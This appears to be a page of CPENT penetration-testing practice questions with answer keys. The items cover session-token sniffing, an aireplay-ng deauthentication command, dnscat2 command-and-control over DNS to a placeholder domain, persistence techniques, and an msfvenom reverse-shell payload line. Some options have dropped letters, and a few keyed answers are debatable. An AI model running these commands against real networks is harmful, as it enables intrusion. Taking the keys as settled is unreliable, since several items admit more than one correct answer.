Question 1

During a penetration testing exercise, you suspect a session hijacking attempt due to unusual session token patterns. What is a suitable initial command to investigate this anomaly on the network?

Options :

A : Run tcpdump -nnxi eth0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' to capture and analyze HTTP session tokens.

B : xecute netstat -an | grep :80 | grep ESTABLISHED to view active connections to port 80 and identify any anomalies.

C : Use wireshark -k -i eth0 -f 'tcp port 80' -a duration:60 to sniff traffic on port 80 for one minute and review sessions.

D : Implementing snort -dev -l ./log -c snort.conf to monitor for signatures associated with session hijacking.

Answer: A

Question 2

Fill in the blank: To perform a deauthentication attack against a wireless client, use the command ________ -0 2 -a [AP MAC] -c [Client MAC] mon0.

Options :

A : aireplay-ng is the correct tool for initiating a deauthentication attack in wireless testing.

B : airmon-ng is typically used to monitor network traffic but not specifically for deauthentication.

C : wireshark can capture packets but is not used to send deauthentication packets in active attacks.

D : kismet is used for network detection and is not capable of conducting deauthentication attacks.

Answer: A

Question 3

In a network penetration test, how would you use dnscat2 to establish a command and control channel over DNS?

Options :

A : dnscat2 --dns server=192.168.0.4,port=5353

B : dnscat2 --dns server=192.168.0.1,domain=tunnel.example.com

C : dnscat2 --dns server=192.168.0.2,port=53

D : dnscat2 --dns server=192.168.0.3,port=5353

Answer: B

Question 4

During a penetration test, a payload needs to be developed to maintain persistence on the target system after reboot. Which technique can be embedded in the payload for this purpose?

Options :

A : Registry key modification for startup execution

B : Scheduled task creation for session renewal

C : dding the payload to the authorized_keys file

D : mbedding the payload in a cron job

Answer: A

Question 5

What is the correct command to generate a pattern using Metasploit's pattern_create tool to identify buffer overflow offsets?

Options :

A : pattern_create -l 200 generates a unique 200-character string used to identify the exact offset in the buffer overflow.

B : pattern_offset -q EIP_VALUE -l 500 identifies the offset within a pattern of 500 bytes based on a crash result.

C : msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[port] -f c generates shellcode but doesn't help identify offsets.

D : gdb --args ./vulnerable_program $(python -c 'print "A" * 500') runs the vulnerable program under a debugger but does not directly calculate the offset.

Answer: A

Higher Test Marks with Free Online CPENT Exam Practice

Buying Options: